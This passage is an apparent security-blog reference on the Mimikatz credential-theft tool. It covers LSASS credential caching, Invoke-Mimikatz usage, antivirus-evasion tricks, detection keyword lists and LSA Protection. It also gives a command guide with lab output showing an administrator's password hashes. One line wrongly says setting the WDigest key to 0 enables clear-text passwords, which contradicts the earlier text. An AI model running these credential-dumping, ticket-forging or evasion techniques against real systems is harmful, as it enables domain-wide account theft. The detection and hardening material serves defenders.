href="http://en.wikipedia.org/wiki/Local_Security_Authority_Subsystem_Service">LSASS, </a>process in memory. This is meant to facilitate single sign-on (SSO) ensuring a user isn’t prompted each time resource access is requested. The credential data may include Kerberos tickets, NTLM password hashes, LM password hashes (if the password is &lt;15 characters, depending on Windows OS version and patch level), and even clear-text passwords (to support WDigest and SSP authentication among others. While you can <a href="http://support.microsoft.com/kb/299656">prevent a Windows computer from creating the LM hash</a> in the local computer SAM database (and the AD database), this doesn’t prevent the system from generating the LM hash in memory. <a href="https://technet.microsoft.com/en-us/magazine/2006.08.securitywatch.aspx">By default, Windows Server 2008 and Windows Vista no longer generate LM hashes</a> for users unless explicitly enabled. Starting with Windows 8.1 and Windows Server 2012 R2, the LM hash and &#8220;clear-text&#8221; password are no longer in memory. <a href="https://adsecurity.org/?p=559">This functionality was also &#8220;back-ported&#8221; to earlier versions of Windows (Windows 7/8/2008R2/2012) in kb2871997</a>, though in order to prevent the &#8220;clear-text&#8221; password from being placed in LSASS, the following registry key needs to be set to &#8220;0&#8221; (Digest Disabled):</p> <p>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest “UseLogonCredential”(DWORD)</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/WDIGEST-RegistryKey-UseLogonCredential-1.jpg" rel="attachment wp-att-2344"><img decoding="async" class="alignnone wp-image-2344" src="https://adsecurity.org/wp-content/uploads/2015/09/WDIGEST-RegistryKey-UseLogonCredential-1.jpg" alt="WDIGEST-RegistryKey-UseLogonCredential-1" width="358" height="175" srcset="https://adsecurity.org/wp-content/uploads/2015/09/WDIGEST-RegistryKey-UseLogonCredential-1.jpg 959w, https://adsecurity.org/wp-content/uploads/2015/09/WDIGEST-RegistryKey-UseLogonCredential-1-300x147.jpg 300w, https://adsecurity.org/wp-content/uploads/2015/09/WDIGEST-RegistryKey-UseLogonCredential-1-768x376.jpg 768w" sizes="(max-width: 358px) 100vw, 358px" /></a></p> <p>This registry key is worth monitoring in your environment since an attacker may wish to set it to 1 to enable Digest password support which forces &#8220;clear-text&#8221; passwords to be placed in LSASS on any version of Windows from Windows 7/2008R2 up to Windows 10/2012R2. Windows 8.1/2012 R2 and newer do not have a “UseLogonCredential” DWORD value, so it would have to be created. The existence of this key on these systems may indicate a problem.</p> <p>Note that running code directly on a target system is rarely desirable for an attacker, so Mimikatz is continuously updated with new capability to be run remotely. This include running Mimikatz remotely against a remote system to dump credentials, using Invoke-Mimikatz remotely with PowerShell Remoting, and <a href="#DCSync">DCSync</a>, the latest feature to grab password data for any Active Directory account in the domain remotely against a DC without any Mimikatz code being run on the DC (<a href="https://adsecurity.org/?p=1729">it uses Microsoft&#8217;s Domain Controller official replication APIs, once the correct rights are attained</a>).</p> <p>&nbsp;</p> <h3><span style="text-decoration: underline;"><strong>Available Credentials by OS:</strong></span></h3> <p>Benjamin Delpy posted an Excel chart on OneDrive (no longer available, but shown below) that shows what type of credential data is available in memory (LSASS), including on Windows 8.1 and Windows 2012 R2 which have enhanced protection mechanisms reducing the amount and type of credentials kept in memory.<br /> <a href="https://adsecurity.org/wp-content/uploads/2014/11/Delpy-CredentialDataChart.png"><img decoding="async" class="alignnone wp-image-583" src="https://adsecurity.org/wp-content/uploads/2014/11/Delpy-CredentialDataChart-300x129.png" alt="Delpy-CredentialDataChart" width="339" height="146" srcset="https://adsecurity.org/wp-content/uploads/2014/11/Delpy-CredentialDataChart-300x129.png 300w, https://adsecurity.org/wp-content/uploads/2014/11/Delpy-CredentialDataChart-1024x441.png 1024w, https://adsecurity.org/wp-content/uploads/2014/11/Delpy-CredentialDataChart.png 1610w" sizes="(max-width: 339px) 100vw, 339px" /></a><br /> <em>(Click image to embiggen)</em></p> <p>&nbsp;</p> <h3><span style="text-decoration: underline;"><strong>PowerShell &amp; Mimikatz:</strong></span></h3> <p>The majority of Mimikatz functionality is available in <a href="https://github.com/mattifestation/PowerSploit">PowerSploit </a>(PowerShell Post-Exploitation Framework) through the “<a href="https://github.com/mattifestation/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1">Invoke-Mimikatz</a>” PowerShell script (written by <a href="https://twitter.com/JosephBialek">Joseph Bialek</a>) which “leverages Mimikatz 2.0 and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory. This allows you to do things such as dump credentials without ever writing the Mimikatz binary to disk.” Note that the PowerSploit framework is now hosted in the <a href="https://github.com/PowerShellMafia/PowerSploit">&#8220;PowerShellMafia&#8221; GitHub repository</a>.</p> <p>What gives Invoke-Mimikatz its &#8220;magic&#8221; is the ability to reflectively load the Mimikatz DLL (embedded in the script) into memory. The Invoke-Mimikatz code can be downloaded from the Internet (or intranet server), and executed from memory without anything touching disk. Furthermore, if Invoke-Mimikatz is run with the appropriate rights and the target computer has PowerShell Remoting enabled, it can pull credentials from other systems, as well as execute the standard Mimikatz commands remotely, without files being dropped on the remote system.</p> <p>Invoke-Mimikatz is not updated when Mimikatz is, though it can be (manually). One can swap out the DLL encoded elements (32bit &amp; 64bit versions) with newer ones. Will Schroeder (<a href="https://twitter.com/harmj0y">@HarmJ0y)</a> has <a href="http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/">information on updating the Mimikatz DLLs in Invoke-Mimikatz</a> (it&#8217;s not a very complicated process). The <a href="https://raw.githubusercontent.com/PowerShellEmpire/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1">PowerShell Empire version of Invoke-Mimikatz</a> is usually kept up to date.</p> <ul> <li>Use mimikatz to dump credentials out of LSASS:  <em>Invoke-Mimikatz -DumpCreds</em></li> <li>Use mimikatz to export all private certificates (even if they are marked non-exportable): <em>Invoke-Mimikatz &#8211;</em>DumpCerts</li> <li>Elevate privilege to have debug rights on remote computer: <em>Invoke-Mimikatz -Command &#8220;privilege::debug exit&#8221; -ComputerName &#8220;computer1&#8221;</em></li> </ul> <p>The Invoke-Mimikatz &#8220;Command&#8221; parameter enables Invoke-Mimikatz to run custom Mimikatz commands.</p> <p><strong><em>Defenders should expect that any functionality included in Mimikatz is available in Invoke-Mimikatz.</em></strong></p> <p>&nbsp;</p> <h3><span style="text-decoration: underline;"><strong>Detecting Mimikatz:</strong></span></h3> <p>There are several ways to potentially detect Mimikatz use on a network, though none are guaranteed. Since Mimikatz&#8217;s source code is on <a href="https://github.com/gentilkiwi/mimikatz">GitHub</a>, anyone with Visual Studio can compile their own version. I built my own version of Mimikatz called &#8220;kitikatz&#8221; by replacing all instances of &#8220;mimikatz&#8221; with &#8220;kitikatz&#8221; and the detection rate at VirusTotal was not good (4/54). Windows Defender on my Windows 10 system detected it.  I then replaced &#8220;Benjamin Delpy&#8221; and &#8220;gentilkiwi&#8221; with the same words, just replacing the e&#8217;s with 3&#8217;s and the i&#8217;s with 1&#8217;s. The detection rate was <a href="https://www.virustotal.com/en/file/84b6cd8ccaa60a89c1375bec5044e6240d8a2db3f19fecd763749fa9a530470b/analysis/1449967355/">still poor (4/54)</a>. Windows Defender on my Windows 10 system did not detect it. So, your mileage will vary regarding detection. While <a href="http://blog.virustotal.com/2012/08/av-comparative-analyses-marketing-and.html">VirusTotal is not the best method to determine AV detection</a>, it is a relatively simple method to get some basic numbers.</p> <ul> <li>Benjamin Delpy publishes <a href="https://plusvic.github.io/yara/">YARA rules</a> for Mimikatz on the <a href="https://github.com/gentilkiwi/mimikatz">Mimkatz GitHub repository</a>.</li> <li>Run AntiVirus software with the latest definition files. According to <a href="https://www.virustotal.com/en/">VirusTotal</a>, the <a href="https://www.virustotal.com/en/file/843b2c2e7a631c393a2763dd03d02166cee0631c07d10dae0a2e6a5816280dd8/analysis/">mimikatz.exe dated 11/11/2015</a> (32bit &amp; 64bit) is detected by <a href="https://www.virustotal.com/en/file/843b2c2e7a631c393a2763dd03d02166cee0631c07d10dae0a2e6a5816280dd8/analysis/">35/35 of the AV engines</a>. Renaming the file doesn&#8217;t change the scan results. Note that Benjamin has noted real-world results to be<a href="https://twitter.com/gentilkiwi/status/658344484615421954"> less successful</a>. However, AV will usually flag the known bad files. AntiVirus is part of foundational security &#8211; the first layer in &#8220;defense in depth&#8221;.</li> <li>Mimikatz (as of October) <a href="http://blog.cobaltstrike.com/2015/11/11/revolutionary-device-detects-mimikatz-use/">activates attached BusyLights</a>. <em>[implemented in Mimikatz version 2.0 alpha 20151008 (oe.eo) edition]</em></li> <li>Leverage security software to identify processes that interact with LSASS. Security software that monitors for process injection may also be able to regularly detect Mimikatz use.</li> <li><a href="https://isc.sans.edu/diary/Detecting+Mimikatz+Use+On+Your+Network/19311">HoneyTokens/HoneyHashes</a> involves placing special credentials in memory on a number of computers in the enterprise. These credentials are flagged so when anyone attempts to use them, a critical alert goes out. this requires some sort of push method as well as placing credentials that are attractive to an attacker. In theory, this could detect credential theft and use in the environment.</li> <li>If the WDIGEST registry key (HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest) is supposed to be set to &#8220;0&#8221; in the enterprise to prevent &#8220;clear-text&#8221; passwords from being stored in LSASS and there are systems where it was switched to &#8220;1&#8221;, this may be indicative of credential theft activity. This registry key is worth monitoring in your environment since an attacker may wish to set it to 0 to enable Digest password support which forces &#8220;clear-text&#8221; passwords to be placed in LSASS on any version of Windows from Windows 7/2008R2 up to Windows 10/2012R2 (probably 2016 as well).</li> <li><a href="https://adsecurity.org/?p=1515">Forged Kerberos ticket detection is covered on this page I published in early 2015. These methods can detect Golden Tickets, Silver Tickets, and Trust Tickets</a>. I also have information on <a href="https://adsecurity.org/?p=763">how to detect MS14-068 Kerberos vulnerability exploitation</a>.</li> <li>Enable LSA Protection on all Windows versions in the enterprise that supports it. This prevents Mimikatz from working &#8220;out-of-the-box&#8221; and requires use of the Mimikatz driver which logs events when it interacts with LSASS.</li> <li>There are <a href="https://technet.microsoft.com/en-us/library/mt431757%28v=vs.85%29.aspx">new/updated events starting with Windows 10 and Windows Server 2016</a> to potentially detect Mimikatz use:</li> </ul> <blockquote><p><strong>Added a default process SACL to LSASS.exe</strong><br /> In Windows 10, a default process SACL was added to LSASS.exe to log processes attempting to access LSASS.exe. The SACL is L&#8221;S:(AU;SAFA;0x0010;;;WD)&#8221;. You can enable this under Advanced Audit Policy Configuration\Object Access\Audit Kernel Object.<br /> This can help identify attacks that steal credentials from the memory of a process.</p></blockquote> <p>&nbsp;</p> <h4><span style="text-decoration: underline;">Mimikatz &amp; LSA Protection:</span></h4> <p>Windows Server 2012 R2 and Windows 8.1 includes a new feature called LSA Protection which involves enabling <a href="https://technet.microsoft.com/en-us/library/dn408187.aspx">LSASS as a protected process on Windows Server 2012 R2</a> (Mimikatz can bypass with a driver, but that should make some noise in the event logs):</p> <p><em>The LSA, which includes the Local Security Authority Server Service (LSASS) process, validates users for local and remote sign-ins and enforces local security policies. The Windows 8.1 operating system provides additional protection for the LSA to prevent reading memory and code injection by non-protected processes. This provides added security for the credentials that the LSA stores and manages.</em></p> <p><span style="text-decoration: underline;">Enabling LSA protection:</span></p> <ol> <li>Open the Registry Editor (RegEdit.exe), and navigate to the registry key that is located at: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa and Set the value of the registry key to: “RunAsPPL”=dword:00000001.</li> <li>Create a new GPO and browse to Computer Configuration, Preferences, Windows Settings. Right-click Registry, point to New, and then click Registry Item. The New Registry Properties dialog box appears. In the Hive list, click HKEY_LOCAL_MACHINE. In the Key Path list, browse to SYSTEM\CurrentControlSet\Control\Lsa.  In the Value name box, type RunAsPPL. In the Value type box, click the REG_DWORD. In the Value data box, type 00000001.Click OK.</li> </ol> <p>LSA Protection prevents non-protected processes from interacting with LSASS. Mimikatz can still bypass this with a driver (&#8220;!+&#8221;).</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Driver-Remove-LSASS-Protection.jpg" rel="attachment wp-att-2178"><img loading="lazy" decoding="async" class="alignnone wp-image-2178" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Driver-Remove-LSASS-Protection.jpg" alt="Mimikatz-Driver-Remove-LSASS-Protection" width="281" height="139" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Driver-Remove-LSASS-Protection.jpg 682w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Driver-Remove-LSASS-Protection-300x148.jpg 300w" sizes="(max-width: 281px) 100vw, 281px" /></a></p> <p>&nbsp;</p> <h3><span style="text-decoration: underline;"><strong>Detecting Invoke-Mimikatz:</strong></span></h3> <ul> <li>Ensure all Windows systems have PowerShell v3 or newer. Newer versions of PowerShell have better logging features, especially PowerShell v5.</li> <li>Enable PowerShell Module Logging via Group Policy: Computer Configuration, Policies, Administrative Templates, Windows Components, and Windows PowerShell,Turn on Module Logging. Enter &#8220;*&#8221; and click OK. This will log all PowerShell activity including all PowerShell modules.</li> </ul> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/PowerShellModuleLogging-All.jpg" rel="attachment wp-att-2191"><img loading="lazy" decoding="async" class="alignnone wp-image-2191" src="https://adsecurity.org/wp-content/uploads/2015/09/PowerShellModuleLogging-All.jpg" alt="PowerShellModuleLogging-All" width="319" height="294" srcset="https://adsecurity.org/wp-content/uploads/2015/09/PowerShellModuleLogging-All.jpg 704w, https://adsecurity.org/wp-content/uploads/2015/09/PowerShellModuleLogging-All-300x276.jpg 300w" sizes="(max-width: 319px) 100vw, 319px" /></a></p> <ul> <li>PowerShell activity will be logged to the PowerShell Operational Log. Push or pull these events to a central logging server (via <a href="http://blogs.technet.com/b/wincat/archive/2008/08/11/quick-and-dirty-large-scale-eventing-for-windows.aspx">Windows Event Forwarding or similar</a>) or SIEM.</li> <li>Parse PowerShell events for the following: <ul> <li>“System.Reflection.AssemblyName”</li> <li>“System.Reflection.Emit.AssemblyBuilderAccess “</li> <li>“System.Runtime.InteropServices.MarshalAsAttribute”</li> <li>“TOKEN_PRIVILEGES”</li> <li> “SE_PRIVILEGE_ENABLED“</li> </ul> </li> </ul> <p><em>Note: While it may be possible to identify Mimikatz usage by alerting on &#8220;mimikatz&#8221;, &#8220;Delpy&#8221;, or &#8220;gentilkiwi&#8221;, a &#8220;sophisticated&#8221; attacker will likely roll their own version of Mimikatz or Invoke-Mimikatz without these keywords.</em></p> <p>&nbsp;</p> <h4><span style="text-decoration: underline;">Detecting Offensive PowerShell Tools:</span></h4> <p>Many PowerShell offensive tools use the following calls which are logged in PowerShell Module Logging.</p> <ul> <li>“GetDelegateForFunctionPointer”</li> <li>“System.Reflection.AssemblyName“</li> <li>“System.Reflection.Emit.AssemblyBuilderAccess“</li> <li>“System.Management.Automation.WindowsErrorReporting”</li> <li>“MiniDumpWriteDump”</li> <li>“TOKEN_IMPERSONATE”</li> <li>“TOKEN_DUPLICATE”</li> <li>“TOKEN_ADJUST_PRIVILEGES”</li> <li>“TOKEN_PRIVILEGES”</li> </ul> <p>&nbsp;</p> <h3><span style="text-decoration: underline;"><strong>&#8220;Sneaky&#8221; Mimikatz Execution:</strong></span></h3> <p>Casey Smith (<a href="https://twitter.com/subTee">@subtee </a>&amp; <a href="http://subt0x10.blogspot.com/">blog</a>) has done a LOT of work showing how <a href="http://subt0x10.blogspot.com/2015/11/your-whitelisting-application-has-no.html">application whitelisting is not the panacea many believe it to be</a>. Despite that, application whitelisting is a solid layer in a defense in depth strategy.<br /> Casey also has come up with many creative and sneaky ways to execute Mimikatz.</p> <ul> <li>Execute Mimikatz Inside of RegSvcs or RegAsm &#8211; .NET utilities Proof of Concept</li> <li><a href="http://subt0x10.blogspot.com/2015/09/simple-example-of-encoded-mimikatz-upx.html">Mimikatz packed &amp; hidden in an image file </a></li> <li>Downloads and Executes Mimikatz In Memory From GitHub</li> </ul> <p>Note: Subtee has discontinued his GitHub repo, so these links no longer work and have been removed.</p> <h3><span style="text-decoration: underline;"><strong>Most Popular Mimikatz Commands:</strong></span></h3> <p>Here are just some of the most popular Mimikatz command and related functionality.</p> <ul> <li><a href="#CRYPTOCertificates">CRYPTO::Certificates</a> &#8211; list/export certificates</li> <li><a href="#KERBEROSGolden">KERBEROS::Golden</a> &#8211; create golden/silver/trust tickets</li> <li><a href="#KERBEROSList">KERBEROS::List</a> &#8211; List all user tickets (TGT and TGS) in user memory. No special privileges required since it only displays the current user&#8217;s tickets.Similar to functionality of &#8220;klist&#8221;.</li> <li><a href="#KERBEROSPTT">KERBEROS::PTT</a> &#8211; pass the ticket. Typically used to inject a stolen or forged Kerberos ticket (golden/silver/trust).</li> <li><a href="#LSADUMPDCSync">LSADUMP::DCSync</a> &#8211; ask a DC to synchronize an object (get password data for account). No need to run code on DC.</li> <li><a href="#LSADUMPLSA">LSADUMP::LSA</a> &#8211; Ask LSA Server to retrieve SAM/AD enterprise (normal, patch on the fly or inject). Use to dump all Active Directory domain credentials from a Domain Controller or lsass.dmp dump file. Also used to get specific account credential such as krbtgt with the parameter /name: &#8220;/name:krbtgt&#8221;</li> <li><a href="#LSADUMPSAM">LSADUMP::SAM</a> &#8211; get the SysKey to decrypt SAM entries (from registry or hive). The SAM option connects to the local Security Account Manager (SAM) database and dumps credentials for local accounts. This is used to dump all local credentials on a Windows computer.</li> <li><a href="#LSADUMPTrust">LSADUMP::Trust </a>&#8211; Ask LSA Server to retrieve Trust Auth Information (normal or patch on the fly). Dumps trust keys (passwords) for all associated trusts (domain/forest).</li> <li><a href="#MISCAddSid">MISC::AddSid</a> &#8211; Add to SIDHistory to user account. The first value is the target account and the second value is the account/group name(s) (or SID). Moved to SID:modify as of May 6th, 2016.</li> <li><a href="#MISCMemSSP">MISC::MemSSP</a> &#8211; Inject a malicious Windows SSP to log locally authenticated credentials.</li> <li><a href="#MISCSkeleton">MISC::Skeleton</a> &#8211; Inject Skeleton Key into LSASS process on Domain Controller. This enables all user authentication to the Skeleton Key patched DC to use a &#8220;master password&#8221; (aka Skeleton Keys) as well as their usual password.</li> <li><a href="#PRIVILEGEDebug">PRIVILEGE::Debug</a> &#8211; get debug rights (this or Local System rights is required for many Mimikatz commands).</li> <li><a href="#SEKURLSAEkeys">SEKURLSA::Ekeys </a>&#8211; list Kerberos encryption keys</li> <li><a href="#SEKURLSAKerberos">SEKURLSA::Kerberos</a> &#8211; List Kerberos credentials for all authenticated users (including services and computer account)</li> <li><a href="#SEKURLSAKrbtgt">SEKURLSA::Krbtgt</a> &#8211; get Domain Kerberos service account (KRBTGT)password data</li> <li><a href="#SEKURLSALogonPasswords">SEKURLSA::LogonPasswords </a>&#8211; lists all available provider credentials. This usually shows recently logged on user and computer credentials.</li> <li><a href="#SEKURLSAPth">SEKURLSA::Pth</a> &#8211; Pass- theHash and Over-Pass-the-Hash</li> <li><a href="#SEKURLSATickets">SEKURLSA::Tickets</a> &#8211; Lists all available Kerberos tickets for all recently authenticated users, including services running under the context of a user account and the local computer&#8217;s AD computer account. Unlike kerberos::list, sekurlsa uses memory reading and is not subject to key export restrictions. sekurlsa can access tickets of others sessions (users).</li> <li><a href="#TOKENList">TOKEN::List</a> &#8211; list all tokens of the system</li> <li><a href="#TOKENElevate">TOKEN::Elevate</a> &#8211; impersonate a token. Used to elevate permissions to SYSTEM (default) or find a domain admin token on the box</li> <li><a href="#TOKENElevate">TOKEN::Elevate /domainadmin</a> &#8211; impersonate a token with Domain Admin credentials.</li> </ul> <p>&nbsp;</p> <h3><span style="text-decoration: underline;"><strong>ADSecurity Mimikatz Posts:</strong></span></h3> <p>All posts mentioning Mimikatz: <a href="https://adsecurity.org/?tag=mimikatz">ADSecurity.org Mimikatz Posts</a></p> <ul> <li><a href="https://adsecurity.org/?p=556">Mimikatz and Active Directory Kerberos Attacks</a></li> <li><a href="https://adsecurity.org/?p=2053">Dump Clear-Text Passwords for All Admins in the Domain Using Mimikatz DCSync </a></li> <li><a href="https://adsecurity.org/?p=2011">How Attackers Use Kerberos Silver Tickets to Exploit Systems </a></li> <li><a href="https://adsecurity.org/?p=1729">Mimikatz DCSync Usage, Exploitation, and Detection </a></li> <li><a href="https://adsecurity.org/?p=1760">Sneaky Active Directory Persistence #12: Malicious Security Support Provider (SSP)</a></li> <li><a href="https://adsecurity.org/?p=1714">Sneaky Active Directory Persistence #11: Directory Service Restore Mode (DSRM) </a></li> <li><a href="https://adsecurity.org/?p=1640">Kerberos Golden Tickets are Now More Golden </a></li> <li><a href="https://adsecurity.org/?p=1588">It’s All About Trust – Forging Kerberos Trust Tickets to Spoof Access across Active Directory Trusts </a></li> <li><a href="https://adsecurity.org/?p=1567">Detecting Mimikatz Use </a></li> </ul> <p>&nbsp;</p> <h3><span style="text-decoration: underline;"><strong>Mimikatz Command Guide:</strong></span></h3> <p>Mimikatz can be executed in interactive mode by simply running &#8220;Mimikatz.exe&#8221; or pass it a command and exit (example: &#8216;<em>Mimikatz &#8220;kerberos::list&#8221; exit&#8217;</em>). Invoke-Mimikatz does not have an interactive mode.</p> <p>Mimikatz can be used to pass commands from the command line to Mimikatz for processing in order which is useful for Invoke-Mimikatz or when using Mimikatz in scripts. Appending &#8220;exit&#8221; exits Mimikatz after the last command is executed (do this so Mimikatz exits gracefully).</p> <blockquote> <pre><strong>PS C:\temp\mimikatz&gt; .\mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit</strong></pre> <pre>.#####.   mimikatz 2.0 alpha (x64) release "Kiwi en C" (Nov 13 2015 00:44:32) .## ^ ##. ## / \ ##  /* * * ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo) '#####'                                     with 17 modules * * */</pre> <pre>mimikatz(commandline) # <em>privilege::debug</em> Privilege '20' OK</pre> <pre>mimikatz(commandline) # <em>sekurlsa::logonpasswords</em></pre> <pre>Authentication Id : 0 ; 646260 (00000000:0009dc74) Session           : RemoteInteractive from 2 User Name         : adsadministrator Domain            : ADSECLAB Logon Server      : ADSDC03 Logon Time        : 11/27/2015 11:41:27 AM SID               : S-1-5-21-1581655573-3923512380-696647894-500 msv : [00000003] Primary * Username : ADSAdministrator * Domain   : ADSECLAB * NTLM     : 5164b7a0fda365d56739954bbbc23835 * SHA1     : f8db297cb2ae403f8915675cebe79643d0d3b09f [00010000] CredentialKeys * NTLM     : 5164b7a0fda365d56739954bbbc23835 * SHA1     : f8db297cb2ae403f8915675cebe79643d0d3b09f tspkg : wdigest : * Username : ADSAdministrator * Domain   : ADSECLAB * Password : (null) kerberos : * Username : adsadministrator * Domain   : LAB.ADSECURITY.ORG * Password : (null) ssp :   KO</pre> </blockquote> <p>&nbsp;</p> <p>The interactive mode provides a &#8220;Mimikatz console&#8221; where commands can be entered and executed in real-time:</p> <blockquote> <pre><strong>PS C:\temp\mimikatz&gt; .\mimikatz</strong></pre> <pre>.#####.   mimikatz 2.0 alpha (x64) release "Kiwi en C" (Nov 13 2015 00:44:32) .## ^ ##. ## / \ ##  /* * * ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo) '#####'                                     with 17 modules * * */</pre> <pre><strong>mimikatz # privilege::debug</strong> Privilege '20' OK</pre> <pre><strong>mimikatz # sekurlsa::logonpasswords</strong></pre> <pre>Authentication Id : 0 ; 646260 (00000000:0009dc74) Session           : RemoteInteractive from 2 User Name         : adsadministrator Domain            : ADSECLAB Logon Server      : ADSDC03 Logon Time        : 11/27/2015 11:41:27 AM SID               : S-1-5-21-1581655573-3923512380-696647894-500 msv : [00000003] Primary * Username : ADSAdministrator * Domain   : ADSECLAB * NTLM     : 5164b7a0fda365d56739954bbbc23835 * SHA1     : f8db297cb2ae403f8915675cebe79643d0d3b09f [00010000] CredentialKeys * NTLM     : 5164b7a0fda365d56739954bbbc23835 * SHA1     : f8db297cb2ae403f8915675cebe79643d0d3b09f tspkg : wdigest : * Username : ADSAdministrator * Domain   : ADSECLAB * Password : (null) kerberos : * Username : adsadministrator * Domain   : LAB.ADSECURITY.ORG * Password : (null) ssp :   KO credman :</pre> </blockquote> <h4></h4> <h3><span style="text-decoration: underline;"><strong>Mimikatz Command Reference:<br /> </strong></span></h3> <p><strong><a href="https://adsecurity.org/?page_id=1821#MimikatzVersionHistory">Mimikatz Version History</a></strong></p> <h4><span style="text-decoration: underline;">Mimikatz Modules:</span></h4> <ul> <li><a href="https://adsecurity.org/?page_id=1821#BUSYLIGHT">BUSYLIGHT</a></li> <li><a href="#CRYPTO">CRYPTO</a> <ul> <li><a href="#CRYPTOCertificates">CRYPTO::Certificates</a></li> </ul> </li> <li><a href="#DPAPI">DPAPI</a></li> <li><a href="#EVENT">EVENT</a></li> <li><a href="#IIS">IIS</a></li> <li><a href="#KERBEROS">KERBEROS</a> <ul> <li><a href="#KERBEROSGolden">Golden Tickets</a></li> <li><a href="#SilverTicket">Silver Tickets</a></li> <li><a href="#TrustTicket">Trust Tickets</a></li> <li><a href="#KERBEROSPTT">KERBEROS::PTT</a></li> </ul> </li> <li><a href="#LSADUMP">LSADUMP</a> <ul> <li><a href="#DCSync">DCSync</a></li> <li>DCShadow</li> <li><a href="#LSADUMPLSA">LSADUMP::LSA</a></li> <li><a href="#LSADUMPNetSync">LSADUMP::NetSync</a></li> <li><a href="#LSADUMPSAM">LSADUMP::SAM</a></li> <li><a href="#LSADUMPTrust">LSADUMP::Trust </a></li> </ul> </li> <li><a href="#MISC">MISC</a></li> <li><a href="#MINESWEEPER">MINESWEEPER</a></li> <li><a href="#Net">NET</a></li> <li><a href="#PRIVILEGE">PRIVILEGE</a> <ul> <li><a href="#PRIVILEGEDebug">PRIVILEGE::Debug</a></li> </ul> </li> <li><a href="#PROCESS">PROCESS</a></li> <li><a href="#RPC">RPC</a></li> <li><a href="#SERVICE">SERVICE</a></li> <li><a href="#SEKURLSA">SEKURLSA</a> <ul> <li><a href="#SEKURLSAKerberos">SEKURLSA::Kerberos</a></li> <li><a href="#SEKURLSAKrbtgt">SEKURLSA::Krbtgt</a></li> <li><a href="#SEKURLSALogonPasswords">SEKURLSA::LogonPasswords </a></li> <li><a href="#SEKURLSAPth">SEKURLSA::Pth</a></li> </ul> </li> <li><a href="#SID">SID</a></li> <li><a href="#STANDARD">STANDARD</a></li> <li><a href="#SYSENV">SYSENV</a></li> <li><a href="#TOKEN">TOKEN</a> <ul> <li><a href="#TOKENElevate">TOKEN::Elevate</a></li> <li><a href="#TOKENElevate">TOKEN::Elevate /domainadmin</a></li> </ul> </li> <li><a href="#TS">TS</a></li> <li><a href="#VAULT">VAULT</a></li> </ul> <p>NOTE: Any item marked &#8220;experimental&#8221; should only be used in test environments.</p> <p><span id="more-1821"></span></p> <h3>Version</h3> <p>Run Version to get the Mimikatz version and additional information about the Windows system, such as the version and if Credential Manager is running.</p> <h3></h3> <h3><b><a id="BUSYLIGHT"></a>BUSYLIGHT</b></h3> <p>The BUSYLIGHT Mimikatz module provides additional information for and control of connected <a href="http://blog.cobaltstrike.com/2015/11/11/revolutionary-device-detects-mimikatz-use/">BusyLights</a>.</p> <p><b>BUSYLIGHT::List</b></p> <p><b>BUSYLIGHT::</b><strong>Off</strong></p> <p><b>BUSYLIGHT::Single</b></p> <p><b>BUSYLIGHT::Status</b></p> <p><b>BUSYLIGHT::</b><strong>Test</strong></p> <p>&nbsp;</p> <h3><b><a id="CRYPTO"></a>CRYPTO</b></h3> <p>The CRYPTO Mimikatz module provides advanced capability to interface with Windows cryptographic functions (<a href="https://msdn.microsoft.com/en-us/library/ms867086.aspx">CryptoAPI</a>).<br /> Typical use is to export certificates that aren&#8217;t marked as &#8220;exportable.&#8221;</p> <p><b>CRYPTO::CAPI</b>&#8211; (experimental) Patch CryptoAPI layer for easy export</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Crypto-CAPI.jpg" rel="attachment wp-att-2158"><img loading="lazy" decoding="async" class="alignnone wp-image-2158" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Crypto-CAPI.jpg" alt="Mimikatz-Crypto-CAPI" width="205" height="47" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Crypto-CAPI.jpg 319w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Crypto-CAPI-300x69.jpg 300w" sizes="(max-width: 205px) 100vw, 205px" /></a></p> <p><a id="CRYPTOCertificates"></a><b>CRYPTO::Certificates</b> &#8211; list/export certificates</p> <p>Carlos Perez (aka <a href="https://twitter.com/Carlos_Perez">DarkOperator</a>) has a<a href="http://www.darkoperator.com/blog/2013/6/11/stealing-user-certificates-with-meterpreter-mimikatz-extensi.html"> great blog post on using Mimikatz to export certificates</a>.<br /> This command lists certificates and properties of theirs keys. It can export certificates too. Typically requires &#8220;privilege::debug&#8221;</p> <ul> <li>/systemstore &#8211; optional &#8211; the system store that must be used (default: CERT_SYSTEM_STORE_CURRENT_USER)</li> <li>/store &#8211; optional &#8211; the store that must be used to list/export certificates (default: My) &#8211; full list with crypto::stores</li> <li>/export &#8211; optional &#8211; export all certificates to files (public parts in DER, private parts in PFX files &#8211; password protected with: mimikatz)</li> </ul> <p><span style="text-decoration: underline;">Benjamin&#8217;s comments on CRYPTO:Certificates:</span></p> <ul> <li>See <a href="https://github.com/gentilkiwi/mimikatz/wiki/module-%7E-crypto#stores"><code>crypto::stores</code></a> for valid <code>systemstore</code> list, and its output for <code>store</code> list.</li> <li>Non exportable keys (with <code>KO - ERROR kuhl_m_crypto_exportCert ; Export / CreateFile (0x8009000b)</code>) can often be exported with <a href="https://github.com/gentilkiwi/mimikatz/wiki/module-%7E-crypto#capi"><code>crypto::capi</code></a> and/or <a 